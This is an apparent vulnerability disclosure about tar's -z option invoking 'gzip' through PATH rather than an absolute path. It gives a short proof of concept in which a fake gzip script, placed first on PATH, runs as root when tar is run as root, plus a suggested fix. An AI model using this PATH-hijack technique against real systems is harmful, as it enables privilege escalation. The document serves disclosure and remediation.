Hi! As per subject, I discovered a Path Hijack vulnerabilty in the tar binary. When using the -z switch for gzip compression/decompression the binary calls “gzip” without absolute path, hence allowing the path Hijack. While this, in a normal scenario can be totally harmless, it can be used as a privileged escalation technique when the tar binary is called as root user.
Following lines will provide a basic PoC: ---- export PATH=$(pwd):$PATH echo -e '#!/bin/bash\ntouch /tmp/tarred' > gzip chmod +x gzip touch file.txt tar -zcf backup.tar.gz file.txt ls -la /tmp/tarred -rw-r--r-- 1 root root 0 Nov 3 14:05 /tmp/tarred ---- I have not tested switches for other compression/decompression formats, so there is a chance that they can be used as well as gzip. The remediation would be to make sure that tar calls gzip by its absolute path. Best Regards, Gregorio Giacobbe
